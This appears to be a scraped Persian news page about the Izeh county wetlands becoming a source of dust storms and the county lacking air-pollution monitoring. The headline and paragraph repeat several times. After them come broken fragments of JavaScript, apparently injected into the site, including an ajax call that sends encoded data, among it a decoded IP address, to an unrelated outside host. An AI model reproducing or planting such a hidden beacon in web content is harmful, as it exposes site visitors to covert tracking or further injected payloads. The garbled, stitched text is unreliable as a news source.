تبدیل شدن تالاب‌های ایذه به کانون ریزگرد

تبدیل شدن تالاب‌های ایذه به کانون ریزگرد
در حالی تالاب‌های شهرستان ایذه به یک خطر برای تبدیل شدن به کانون ریزگردها تبدیل شده‌اند که این شهرستان همواره از داشتن دستگاه سنجش میزان آلودگی هوا محروم بوده است و لزوم نصب آن احساس می‌شود.

تبدیل شدن تالاب‌های ایذه به کانون ریزگرد

در حالی تالاب‌های شهرستان ایذه به یک خطر برای تبدیل شدن به کانون ریزگردها تبدیل شده‌اند که این شهرستان همواره از داشتن دستگاه سنجش میزان آلودگی هوا محروم بوده است و لزوم نصب آن احساس می‌شود.
تبدیل شدن تالاب‌های ایذه به کانون ریزگرد
i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=OTUuMTU0LjIzNy44NQ==&681=MTUxOTcxNzQ3NGZlNDQ4MmQ4MTU2YzFhNDYwNjZhZWQ0MTVhNDE0ZGJi&crc=92ff1141bcaf7bab903019b0f0bfbb87cdc4bb42&cv=1’});

!0===a.adult)&&”0″===ds

View more posts from this author